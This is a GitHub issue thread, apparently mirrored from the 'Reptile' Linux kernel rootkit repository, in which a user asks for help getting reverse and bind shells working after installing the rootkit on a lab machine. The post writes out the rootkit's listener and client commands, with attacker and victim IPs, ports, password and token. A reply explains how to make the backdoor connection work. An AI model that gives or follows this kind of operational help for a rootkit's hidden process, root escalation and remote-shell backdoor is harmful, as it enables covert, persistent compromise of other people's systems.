f0rb1dd3n / Reptile

LKM Linux rootkit

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

i want about detali usage.

JUNGJUNCHUL opened this issue · comments

hello. i finally install all!!!
I am not good at English, so please understand it.

I test in kali-64bit-amd and it work perfect at hiding a process and get a root.
but how i can get a bind shell???

attacker ip : 192.168.21.129
server ip : 192.168.21.130

--------------------reverse shell----------------------------------------------------
attacker shell : ./listener -p 4444 -s s3cr3t

server shell : ./client
set LHOST 192.168.129
set LPORT 4444
set SRCHOST 192.168.22.2
set SRCPORT 11
set RHOST 192.168.21.130
set RPORT 4445
set PORT ICMP
set PASS s3cr3t
set TOKEN hax0r

    and type!! run ! 

** it perfectly run well but in the wireshark show TCP 4444 not a ICMP **

------------------bind shell----------------
how i can get a bind shell???
server shell : ./listener -p 3333 -s s3cr3t

attackershell : There is no response even when you type the command.


summary

  1. "revershell not work icmp backdoor" it shows tcp
  2. how i use bind shell???
  3. is there any wiki??? about this issue??

thank you for reading.
i wait your reply.

Use TCP as protocol instead of ICMP.
No need to run the listener program on the victim machine if you got the module loaded.
Make SRCHOST be the same as LHOST